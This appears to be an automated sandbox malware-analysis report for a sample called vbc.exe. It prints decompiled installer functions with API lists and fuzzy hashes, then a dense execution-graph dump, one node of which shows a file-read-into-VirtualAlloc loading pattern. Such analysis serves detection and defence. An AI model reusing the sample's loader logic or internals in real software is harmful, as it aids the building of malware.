                          • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                          • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040560C(CHAR* _a4) {
                          				CHAR* _t3;
                          				char* _t5;
                          				CHAR* _t7;
                          				CHAR* _t8;
                          				void* _t10;
                          
                          				_t8 = _a4;
                          				_t7 = CharNextA(_t8);
                          				_t3 = CharNextA(_t7);
                          				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                          					if( *_t8 != 0x5c5c) {
                          						L8:
                          						return 0;
                          					}
                          					_t10 = 2;
                          					while(1) {
                          						_t10 = _t10 - 1;
                          						_t5 = E004055A3(_t3, 0x5c);
                          						if( *_t5 == 0) {
                          							goto L8;
                          						}
                          						_t3 = _t5 + 1;
                          						if(_t10 != 0) {
                          							continue;
                          						}
                          						return _t3;
                          					}
                          					goto L8;
                          				} else {
                          					return CharNextA(_t3);
                          				}
                          			}








                          APIs
                          • CharNextA.USER32(004053BE), ref: 0040561A
                          • CharNextA.USER32(00000000), ref: 0040561F
                          • CharNextA.USER32(00000000), ref: 0040562E
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharNext
                          • String ID: C:\
                          • API String ID: 3213498283-3404278061
                          • Opcode ID: 823a6b04a944e09c4ec49499f0146cce19f7af5e9ff0db91097355eacddc88c5
                          • Instruction ID: 8d77621b7085ccb429820eca4f781d68bcfd126ff613cd56e481de53d81d286f
                          • Opcode Fuzzy Hash: 823a6b04a944e09c4ec49499f0146cce19f7af5e9ff0db91097355eacddc88c5
                          • Instruction Fuzzy Hash: EAF02752A84A202AEB2232680C54B2B579CCBA5750F444C33E244B62D1C2BD4C838FEA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E00401D1B() {
                          				void* __esi;
                          				int _t6;
                          				signed char _t11;
                          				struct HFONT__* _t14;
                          				void* _t18;
                          				void* _t24;
                          				void* _t26;
                          				void* _t28;
                          
                          				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                          				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                          				 *0x40af7c = E004029CB(3);
                          				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                          				 *0x40af83 = 1;
                          				 *0x40af80 = _t11 & 0x00000001;
                          				 *0x40af81 = _t11 & 0x00000002;
                          				 *0x40af82 = _t11 & 0x00000004;
                          				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
                          				_t14 = CreateFontIndirectA(0x40af6c);
                          				_push(_t14);
                          				_push(_t26);
                          				E004059E3();
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
                          				return 0;
                          			}











                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirect
                          • String ID:
                          • API String ID: 3272661963-0
                          • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                          • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                          • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                          • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                          				long _t22;
                          
                          				if(_a8 != 0x102) {
                          					if(_a8 != 0x200) {
                          						_t22 = _a16;
                          						L7:
                          						if(_a8 == 0x419 &&  *0x420480 != _t22) {
                          							 *0x420480 = _t22;
                          							E00405A85(0x420498, 0x424000);
                          							E004059E3(0x424000, _t22);
                          							E0040140B(6);
                          							E00405A85(0x424000, 0x420498);
                          						}
                          						L11:
                          						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
                          					}
                          					if(IsWindowVisible(_a4) == 0) {
                          						L10:
                          						_t22 = _a16;
                          						goto L11;
                          					}
                          					_t22 = E004046F2(_a4, 1);
                          					_a8 = 0x419;
                          					goto L7;
                          				}
                          				if(_a12 != 0x20) {
                          					goto L10;
                          				}
                          				E00403E83(0x413);
                          				return 0;
                          			}




                          APIs
                          • IsWindowVisible.USER32(?), ref: 00404DA9
                          • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E17
                            • Part of subcall function 00403E83: SendMessageA.USER32 ref: 00403E95
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                          • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                          • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                          • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004055BF(char* _a4) {
                          				char* _t3;
                          				char* _t5;
                          
                          				_t5 = _a4;
                          				_t3 =  &(_t5[lstrlenA(_t5)]);
                          				while( *_t3 != 0x5c) {
                          					_t3 = CharPrevA(_t5, _t3);
                          					if(_t3 > _t5) {
                          						continue;
                          					}
                          					break;
                          				}
                          				 *_t3 =  *_t3 & 0x00000000;
                          				return  &(_t3[1]);
                          			}






                          APIs
                          • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402CC7,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 004055C5
                          • CharPrevA.USER32(80000000,00000000), ref: 004055D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\Public
                          • API String ID: 2709904686-2272764151
                          • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                          • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                          • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                          • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004056D1(CHAR* _a4, CHAR* _a8) {
                          				int _t10;
                          				int _t15;
                          				CHAR* _t16;
                          
                          				_t15 = lstrlenA(_a8);
                          				_t16 = _a4;
                          				while(lstrlenA(_t16) >= _t15) {
                          					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                          					_t10 = lstrcmpiA(_t16, _a8);
                          					if(_t10 == 0) {
                          						return _t16;
                          					}
                          					_t16 = CharNextA(_t16);
                          				}
                          				return 0;
                          			}







                          APIs
                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                          • CharNextA.USER32(00000000), ref: 004056FF
                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                          • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                          • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                          • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:6.7%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:4.4%
                          Total number of Nodes:1503
                          Total number of Limit Nodes:40
_free 58 API calls 7143->7144 7145 8b26e8 7144->7145 7146 8b0308 _free 58 API calls 7145->7146 7147 8b26f0 7146->7147 7148 8b0308 _free 58 API calls 7147->7148 7149 8b26f7 7148->7149 7150 8b0308 _free 58 API calls 7149->7150 7151 8b26ff 7150->7151 7152 8b0308 _free 58 API calls 7151->7152 7153 8b2707 7152->7153 7154 8b0308 _free 58 API calls 7153->7154 7155 8b270f 7154->7155 7156 8b0308 _free 58 API calls 7155->7156 7157 8b2717 7156->7157 7158 8b0308 _free 58 API calls 7157->7158 7159 8b271f 7158->7159 7160 8b0308 _free 58 API calls 7159->7160 7161 8b2727 7160->7161 7162 8b0308 _free 58 API calls 7161->7162 7163 8b272f 7162->7163 7164 8b0308 _free 58 API calls 7163->7164 7165 8b2737 7164->7165 7166 8b0308 _free 58 API calls 7165->7166 7167 8b273f 7166->7167 7168 8b0308 _free 58 API calls 7167->7168 7169 8b274a 7168->7169 7170 8b0308 _free 58 API calls 7169->7170 7171 8b2752 7170->7171 7172 8b0308 _free 58 API calls 7171->7172 7173 8b275a 7172->7173 7174 8b0308 _free 58 API calls 7173->7174 7175 8b2762 7174->7175 7176 8b0308 _free 58 API calls 7175->7176 7177 8b276a 7176->7177 7178 8b0308 _free 58 API calls 7177->7178 7179 8b2772 7178->7179 7180 8b0308 _free 58 API calls 7179->7180 7181 8b277a 7180->7181 7182 8b0308 _free 58 API calls 7181->7182 7183 8b2782 7182->7183 7184 8b0308 _free 58 API calls 7183->7184 7185 8b278a 7184->7185 7186 8b0308 _free 58 API calls 7185->7186 7187 8b2792 7186->7187 7188 8b0308 _free 58 API calls 7187->7188 7189 8b279a 7188->7189 7190 8b0308 _free 58 API calls 7189->7190 7191 8b27a2 7190->7191 7192 8b0308 _free 58 API calls 7191->7192 7193 8b27aa 7192->7193 7194 8b0308 _free 58 API calls 7193->7194 7195 8b27b2 7194->7195 7196 8b0308 _free 58 API calls 7195->7196 7197 8b27ba 7196->7197 7198 8b0308 _free 58 API calls 7197->7198 7199 8b27c2 7198->7199 7200 8b0308 _free 58 API calls 7199->7200 7201 8b27d0 7200->7201 7202 8b0308 _free 58 API calls 7201->7202 7203 8b27db 7202->7203 7204 8b0308 _free 58 API calls 7203->7204 7205 8b27e6 
7204->7205 7206 8b0308 _free 58 API calls 7205->7206 7207 8b27f1 7206->7207 7208 8b0308 _free 58 API calls 7207->7208 7209 8b27fc 7208->7209 7210 8b0308 _free 58 API calls 7209->7210 7211 8b2807 7210->7211 7212 8b0308 _free 58 API calls 7211->7212 7213 8b2812 7212->7213 7214 8b0308 _free 58 API calls 7213->7214 7215 8b281d 7214->7215 7216 8b0308 _free 58 API calls 7215->7216 7217 8b2828 7216->7217 7218 8b0308 _free 58 API calls 7217->7218 7219 8b2833 7218->7219 7220 8b0308 _free 58 API calls 7219->7220 7221 8b283e 7220->7221 7222 8b0308 _free 58 API calls 7221->7222 7223 8b2849 7222->7223 7224 8b0308 _free 58 API calls 7223->7224 7225 8b2854 7224->7225 7226 8b0308 _free 58 API calls 7225->7226 7227 8b285f 7226->7227 7228 8b0308 _free 58 API calls 7227->7228 7229 8b286a 7228->7229 7230 8b0308 _free 58 API calls 7229->7230 7231 8b2875 7230->7231 7232 8b0308 _free 58 API calls 7231->7232 7233 8b2883 7232->7233 7234 8b0308 _free 58 API calls 7233->7234 7235 8b288e 7234->7235 7236 8b0308 _free 58 API calls 7235->7236 7237 8b2899 7236->7237 7238 8b0308 _free 58 API calls 7237->7238 7239 8b28a4 7238->7239 7240 8b0308 _free 58 API calls 7239->7240 7241 8b28af 7240->7241 7242 8b0308 _free 58 API calls 7241->7242 7243 8b28ba 7242->7243 7244 8b0308 _free 58 API calls 7243->7244 7245 8b28c5 7244->7245 7246 8b0308 _free 58 API calls 7245->7246 7247 8b28d0 7246->7247 7248 8b0308 _free 58 API calls 7247->7248 7249 8b28db 7248->7249 7250 8b0308 _free 58 API calls 7249->7250 7251 8b28e6 7250->7251 7252 8b0308 _free 58 API calls 7251->7252 7253 8b28f1 7252->7253 7254 8b0308 _free 58 API calls 7253->7254 7255 8b28fc 7254->7255 7256 8b0308 _free 58 API calls 7255->7256 7257 8b2907 7256->7257 7258 8b0308 _free 58 API calls 7257->7258 7259 8b2912 7258->7259 7260 8b0308 _free 58 API calls 7259->7260 7261 8b291d 7260->7261 7262 8b0308 _free 58 API calls 7261->7262 7263 8b2928 7262->7263 7264 8b0308 _free 58 API calls 7263->7264 7265 8b2936 7264->7265 7266 8b0308 _free 58 API calls 
7265->7266 7267 8b2941 7266->7267 7268 8b0308 _free 58 API calls 7267->7268 7269 8b294c 7268->7269 7270 8b0308 _free 58 API calls 7269->7270 7271 8b2957 7270->7271 7272 8b0308 _free 58 API calls 7271->7272 7273 8b2962 7272->7273 7274 8b0308 _free 58 API calls 7273->7274 7275 8b296d 7274->7275 7276 8b0308 _free 58 API calls 7275->7276 7277 8b2978 7276->7277 7278 8b0308 _free 58 API calls 7277->7278 7279 8b2983 7278->7279 7280 8b0308 _free 58 API calls 7279->7280 7281 8b298e 7280->7281 7282 8b0308 _free 58 API calls 7281->7282 7283 8b2999 7282->7283 7284 8b0308 _free 58 API calls 7283->7284 7285 8b29a4 7284->7285 7286 8b0308 _free 58 API calls 7285->7286 7287 8b29af 7286->7287 7288 8b0308 _free 58 API calls 7287->7288 7289 8b29ba 7288->7289 7290 8b0308 _free 58 API calls 7289->7290 7291 8b29c5 7290->7291 7292 8b0308 _free 58 API calls 7291->7292 7293 8b29d0 7292->7293 7294 8b0308 _free 58 API calls 7293->7294 7295 8b29db 7294->7295 7296 8b0308 _free 58 API calls 7295->7296 7297 8b29e9 7296->7297 7298 8b0308 _free 58 API calls 7297->7298 7299 8b29f4 7298->7299 7300 8b0308 _free 58 API calls 7299->7300 7301 8b29ff 7300->7301 7302 8b0308 _free 58 API calls 7301->7302 7303 8b2a0a 7302->7303 7304 8b0308 _free 58 API calls 7303->7304 7305 8b2a15 7304->7305 7306 8b0308 _free 58 API calls 7305->7306 7307 8b2a20 7306->7307 7308 8b0308 _free 58 API calls 7307->7308 7308->7134 7309->7062 7313 8b02f3 LeaveCriticalSection 7310->7313 7312 8b0b56 7312->7049 7313->7312 7315 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7314->7315 7316 8b6b11 7315->7316 7317 8b6b7d 7316->7317 7318 8b6b1d 7316->7318 7323 8b6b9b 7317->7323 7333 8b44cc 7317->7333 7325 8b6b32 7318->7325 7326 8b77bc 7318->7326 7319 8b10b7 __mtinitlocknum 58 API calls 7321 8b6ba1 7319->7321 7336 8b2c35 7321->7336 7323->7319 7323->7321 7325->7001 7327 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7326->7327 7328 8b77ce 7327->7328 7329 8b77db 7328->7329 7330 8b44cc __isleadbyte_l 58 API calls 7328->7330 7329->7325 7331 
8b77ff 7330->7331 7341 8b2d91 7331->7341 7334 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7333->7334 7335 8b44dd 7334->7335 7335->7323 7337 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7336->7337 7338 8b2c46 7337->7338 7363 8b2a31 7338->7363 7342 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7341->7342 7343 8b2da2 7342->7343 7346 8b2c99 7343->7346 7347 8b2cb3 7346->7347 7348 8b2cc0 MultiByteToWideChar 7346->7348 7347->7348 7349 8b2cec 7348->7349 7358 8b2ce5 7348->7358 7352 8b2d0e _memset __crtGetStringTypeA_stat 7349->7352 7354 8b2397 __malloc_crt 58 API calls 7349->7354 7350 8b1cfb ___crtMessageBoxW 6 API calls 7351 8b2d8d 7350->7351 7351->7329 7353 8b2d4a MultiByteToWideChar 7352->7353 7352->7358 7355 8b2d74 7353->7355 7356 8b2d64 GetStringTypeW 7353->7356 7354->7352 7359 8b2c7b 7355->7359 7356->7355 7358->7350 7360 8b2c96 7359->7360 7361 8b2c85 7359->7361 7360->7358 7361->7360 7362 8b0308 _free 58 API calls 7361->7362 7362->7360 7365 8b2a4a MultiByteToWideChar 7363->7365 7367 8b2ab0 7365->7367 7376 8b2aa9 7365->7376 7366 8b1cfb ___crtMessageBoxW 6 API calls 7368 8b2c31 7366->7368 7372 8b2397 __malloc_crt 58 API calls 7367->7372 7377 8b2ad8 __crtGetStringTypeA_stat 7367->7377 7368->7325 7369 8b2b0f MultiByteToWideChar 7370 8b2b76 7369->7370 7371 8b2b28 7369->7371 7374 8b2c7b __freea 58 API calls 7370->7374 7388 8b2f2a 7371->7388 7372->7377 7374->7376 7375 8b2b3c 7375->7370 7378 8b2b52 7375->7378 7380 8b2b7e 7375->7380 7376->7366 7377->7369 7377->7376 7378->7370 7379 8b2f2a __crtLCMapStringA_stat LCMapStringW 7378->7379 7379->7370 7383 8b2397 __malloc_crt 58 API calls 7380->7383 7386 8b2ba6 __crtGetStringTypeA_stat 7380->7386 7381 8b2f2a __crtLCMapStringA_stat LCMapStringW 7382 8b2be9 7381->7382 7384 8b2c11 7382->7384 7387 8b2c03 WideCharToMultiByte 7382->7387 7383->7386 7385 8b2c7b __freea 58 API calls 7384->7385 7385->7370 7386->7370 7386->7381 7387->7384 7389 8b2f55 __crtLCMapStringA_stat 7388->7389 7391 8b2f3a 7388->7391 7390 8b2f6c LCMapStringW 
7389->7390 7390->7375 7391->7375 7393 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7392->7393 7394 8b6a92 7393->7394 7395 8b6aa9 7394->7395 7396 8b77bc __isctype_l 61 API calls 7394->7396 7395->7001 7396->7395 6344 8a4173 6345 8ae871 6344->6345 6379 8af18e GetProcessHeap 6345->6379 6347 8ae8c9 6348 8ae8d4 6347->6348 6455 8ae9b0 6347->6455 6380 8aedfa 6348->6380 6351 8ae8da 6352 8ae8e5 __RTC_Initialize 6351->6352 6353 8ae9b0 _fast_error_exit 58 API calls 6351->6353 6401 8af1a3 6352->6401 6353->6352 6355 8ae8f4 6356 8ae900 GetCommandLineW 6355->6356 6357 8ae9b0 _fast_error_exit 58 API calls 6355->6357 6420 8afab9 GetEnvironmentStringsW 6356->6420 6359 8ae8ff 6357->6359 6359->6356 6362 8ae91a 6363 8ae925 6362->6363 6463 8aeed7 6362->6463 6430 8af694 6363->6430 6367 8ae936 6444 8aef11 6367->6444 6368 8aeed7 __lock 58 API calls 6368->6367 6370 8ae93e 6371 8ae949 __wwincmdln 6370->6371 6372 8aeed7 __lock 58 API calls 6370->6372 6450 8a1000 6371->6450 6372->6371 6375 8ae96c 6475 8aef02 6375->6475 6378 8ae971 __mtinitlocknum 6379->6347 6478 8aefa9 RtlEncodePointer 6380->6478 6382 8aedff 6484 8b02ba 6382->6484 6385 8aee08 6488 8aee70 6385->6488 6390 8aee25 6500 8b0340 6390->6500 6393 8aee67 6395 8aee70 __mtterm 61 API calls 6393->6395 6397 8aee6c 6395->6397 6396 8aee46 6396->6393 6398 8aee4c 6396->6398 6397->6351 6509 8aed47 6398->6509 6400 8aee54 GetCurrentThreadId 6400->6351 6402 8af1af __mtinitlocknum 6401->6402 6403 8b0189 __lock 58 API calls 6402->6403 6404 8af1b6 6403->6404 6405 8b0340 __calloc_crt 58 API calls 6404->6405 6407 8af1c7 6405->6407 6406 8af232 GetStartupInfoW 6414 8af247 6406->6414 6415 8af376 6406->6415 6407->6406 6408 8af1d2 __mtinitlocknum @_EH4_CallFilterFunc@8 6407->6408 6408->6355 6409 8af43e 6771 8af44e 6409->6771 6411 8b0340 __calloc_crt 58 API calls 6411->6414 6412 8af3c3 GetStdHandle 6412->6415 6413 8af3d6 GetFileType 6413->6415 6414->6411 6414->6415 6417 8af295 6414->6417 6415->6409 6415->6412 6415->6413 6419 8afbb7 __mtinitlocknum 
InitializeCriticalSectionAndSpinCount 6415->6419 6416 8af2c9 GetFileType 6416->6417 6417->6415 6417->6416 6418 8afbb7 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6417->6418 6418->6417 6419->6415 6421 8afaca 6420->6421 6422 8ae910 6420->6422 6423 8b0388 __malloc_crt 58 API calls 6421->6423 6426 8af457 GetModuleFileNameW 6422->6426 6424 8afaf0 _memmove 6423->6424 6425 8afb06 FreeEnvironmentStringsW 6424->6425 6425->6422 6427 8af48b _wparse_cmdline 6426->6427 6428 8b0388 __malloc_crt 58 API calls 6427->6428 6429 8af4cb _wparse_cmdline 6427->6429 6428->6429 6429->6362 6431 8af6ad __NMSG_WRITE 6430->6431 6435 8ae92b 6430->6435 6432 8b0340 __calloc_crt 58 API calls 6431->6432 6440 8af6d6 __NMSG_WRITE 6432->6440 6433 8af72d 6434 8b0308 _free 58 API calls 6433->6434 6434->6435 6435->6367 6435->6368 6436 8b0340 __calloc_crt 58 API calls 6436->6440 6437 8af752 6438 8b0308 _free 58 API calls 6437->6438 6438->6435 6439 8b18e2 __NMSG_WRITE 58 API calls 6439->6440 6440->6433 6440->6435 6440->6436 6440->6437 6440->6439 6441 8af769 6440->6441 6442 8b1058 __invoke_watson 8 API calls 6441->6442 6443 8af775 6442->6443 6446 8aef1d __IsNonwritableInCurrentImage 6444->6446 6775 8b1391 6446->6775 6447 8aef3b __initterm_e 6449 8aef5a _doexit __IsNonwritableInCurrentImage 6447->6449 6778 8b137c 6447->6778 6449->6370 6844 8ae750 GetPEB 6450->6844 6452 8a1011 6453 8a1017 CreateFileW GetFileSize VirtualAlloc ReadFile 6452->6453 6454 8a108a 6453->6454 6454->6375 6472 8af17a 6454->6472 6456 8ae9bc 6455->6456 6457 8ae9c1 6455->6457 6459 8af776 __FF_MSGBANNER 58 API calls 6456->6459 6458 8af7d3 __NMSG_WRITE 58 API calls 6457->6458 6460 8ae9c9 6458->6460 6459->6457 6461 8aeec1 __mtinitlocknum 3 API calls 6460->6461 6462 8ae9d3 6461->6462 6462->6348 6464 8af776 __FF_MSGBANNER 58 API calls 6463->6464 6465 8aeedf 6464->6465 6466 8af7d3 __NMSG_WRITE 58 API calls 6465->6466 6467 8aeee7 6466->6467 6845 8aef95 6467->6845 6471 8aeefe 6471->6363 6473 8af04b _doexit 58 API calls 6472->6473 6474 
8af189 6473->6474 6474->6375 6476 8af04b _doexit 58 API calls 6475->6476 6477 8aef0d 6476->6477 6477->6378 6519 8b13d6 6478->6519 6480 8aefba __init_pointers __initp_misc_winsig 6520 8b0178 EncodePointer 6480->6520 6482 8aefd2 __init_pointers 6483 8afc25 34 API calls 6482->6483 6483->6382 6485 8b02c6 6484->6485 6486 8aee04 6485->6486 6521 8afbb7 6485->6521 6486->6385 6497 8afb16 6486->6497 6489 8aee7a 6488->6489 6490 8aee80 6488->6490 6524 8afb34 6489->6524 6492 8b01d3 DeleteCriticalSection 6490->6492 6494 8b01ef 6490->6494 6527 8b0308 6492->6527 6495 8b01fb DeleteCriticalSection 6494->6495 6496 8aee0d 6494->6496 6495->6494 6496->6351 6498 8afb2d TlsAlloc 6497->6498 6499 8aee1a 6497->6499 6499->6385 6499->6390 6502 8b0347 6500->6502 6503 8aee32 6502->6503 6505 8b0365 6502->6505 6553 8b24d4 6502->6553 6503->6393 6506 8afb72 6503->6506 6505->6502 6505->6503 6561 8afebe Sleep 6505->6561 6507 8afb8c TlsSetValue 6506->6507 6508 8afb88 6506->6508 6507->6396 6508->6396 6510 8aed53 __mtinitlocknum 6509->6510 6564 8b0189 6510->6564 6512 8aed90 6513 8aedaa 6512->6513 6571 8aede8 6512->6571 6515 8b0189 __lock 58 API calls 6513->6515 6516 8aedb1 ___addlocaleref 6515->6516 6574 8aedf1 6516->6574 6518 8aeddc __mtinitlocknum 6518->6400 6519->6480 6520->6482 6522 8afbc7 6521->6522 6523 8afbd4 InitializeCriticalSectionAndSpinCount 6521->6523 6522->6485 6523->6485 6525 8afb4b TlsFree 6524->6525 6526 8afb47 6524->6526 6525->6490 6526->6490 6528 8b0311 HeapFree 6527->6528 6532 8b033a __dosmaperr 6527->6532 6529 8b0326 6528->6529 6528->6532 6533 8b10b7 6529->6533 6532->6490 6536 8aecd8 GetLastError 6533->6536 6535 8b032c GetLastError 6535->6532 6550 8afb53 6536->6550 6538 8aeced 6539 8aed3b SetLastError 6538->6539 6540 8b0340 __calloc_crt 55 API calls 6538->6540 6539->6535 6541 8aed00 6540->6541 6541->6539 6542 8afb72 __getptd_noexit TlsSetValue 6541->6542 6543 8aed14 6542->6543 6544 8aed1a 6543->6544 6545 8aed32 6543->6545 6546 8aed47 __initptd 55 API calls 6544->6546 6547 8b0308 
